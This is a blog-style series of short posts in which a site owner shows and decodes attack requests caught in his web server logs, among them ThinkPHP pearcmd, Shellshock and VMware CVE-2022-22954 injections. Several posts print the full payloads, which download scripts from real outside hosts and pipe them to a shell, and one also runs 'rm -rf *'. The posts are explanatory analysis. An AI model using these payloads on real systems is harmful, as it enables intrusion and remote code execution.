Fri, 15 Mar 2024 12:20:16 EDT
Cracker Jack Report
My web server logged the following request on March 14th.
GET /index.php? s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index& cmd=curl%20http%3A%2F%2F193.222.96.163%2Foy.sh%20%7C%20sh%20%7C%7C%20wget%20-O-%20http%3A%2F%2F193.222.96.163%2Foy.sh%20%7C%20sh
The second parameter decodes to:
cmd=curl http://193.222.96.163/oy.sh | sh || wget -O- http://193.222.96.163/oy.sh | sh
You know the drill. Another command injection attack. This attack is a variation on that described in CVE-2022-47945. This is straighforward. Use curl or wget, whichever is available, to download the script oy.sh then pipe it to a shell.
Yet another instance of a PHP module that inserts client data into an executable context. The PHP ecosystem is a security disaster.
Tue, 12 Mar 2024 11:24:04 EDT
Cracker Jack Report
My web server logged the following request on March 11th.
GET /?2dWfN18rtTf8QlVATVMbT2AA1E9=../../../../../../../../etc/passwd &2dWfN18rtTf8QlVATVMbT2AA1E9=1%20and%20updatexml(1,concat(0x7e,(select%20md5(85453))),1)
The second parameter decodes to:
1 and updatexml(1,concat(~,(select md5(85453))),1)
This is an XPath injection attack that seeks to cause an application server to dump the system password file.
The infrastructure of the web is a swamp of security vulerabilities, which is one of the reasons why it must be replaced.
Mon, 26 Feb 2024 15:45:42 EST
Cracker Jack Report
Below is the User-Agent header of a client request on my website for February 24th. I have reformatted a single line of commands.
() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://204.76.203.216/nigga.sh; chmod 777 nigga.sh; ./nigga.sh'
This is a variation on the Shellshock attack. It is associated with more than one CVE (CVE2014-*). The first line is gibberish that triggers the vulnerability to be exploited in the bash shell. The second line probably plays a role in the exploit, but I’m not sure.
The commands have not been obfuscated with percent-encoding because they have been inserted into the User-Agent header. It would be unusual for a web or application server to percent-decode that header. The target web or application server puts that header into a context in which it is parsed by a shell. What a disaster.
This is a standard command injection attack: delete the current filesysem hierarchy, change to the /tmp directory because it’s world-writeable, download a script, make it executable, and run it. The shell script installs tools to facilitate remote command execution.
Sat, 17 Feb 2024 11:08:38 EST
Cracker Jack Report
I have another injection attack for your perusal. The request has been split in two. This is from my web server log for February 16th.
GET /catalog-portal/ui/oauth/verify?error=& deviceUdid=%24%7b%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%6d%6b%64%69%72%20%2d%70%20%2f%74%6d%70%2f%24%28%77%68%6f%61%6d%69%29%3b%20%63%64%20%2f%74%6d%70%2f%24%28%77%68%6f%61%6d%69%29%3b%20%77%67%65%74%20%68%74%74%70%3a%2f%2f%64%77%2e%6f%68%75%79%61%6c%2e%78%79%7a%2f%64%6f%77%6e%6c%6f%61%64%2f%72%65%64%74%61%69%6c%2e%73%68%20%2d%4f%2d%20%7c%20%73%68%3b%20%63%75%72%6c%20%68%74%74%70%3a%2f%2f%64%77%2e%6f%68%75%79%61%6c%2e%78%79%7a%2f%64%6f%77%6e%6c%6f%61%64%2f%72%65%64%74%61%69%6c%2e%73%68%20%7c%20%73%68%3b%20%65%63%68%6f%20%76%6d%77%61%72%65%2e%73%65%6c%66%72%65%70%22%29%7d%7d
I decoded the percent-encoded text with munger…
(let ((r0 (regcomp "%([0-9A-Fa-f][0-9A-Fa-f])"))) (defun decode (str) (replace r0 (char (hex2dec m1)) str)))
…and formatted the output.
${ {"freemarker.template.utility.Execute"? new() ("mkdir -p /tmp/$(whoami); cd /tmp/$(whoami); wget http://dw.ohuyal.xyz/download/redtail.sh -O- | sh; curl http://dw.ohuyal.xyz/download/redtail.sh | sh; echo vmware.selfrep") } }
This is the attack described in CVE-2022-22954. It targets VMWare Workspace ONE Access and Identity Manager. This is another example of a support utility passing unsanitized arguments to a shell for interpretation. Two attempts are made to download the redtail.sh script, each invoking a different utility in case one or the other is not installed on the host. The downloaded script is then fed directly to a subshell for execution. What a disaster.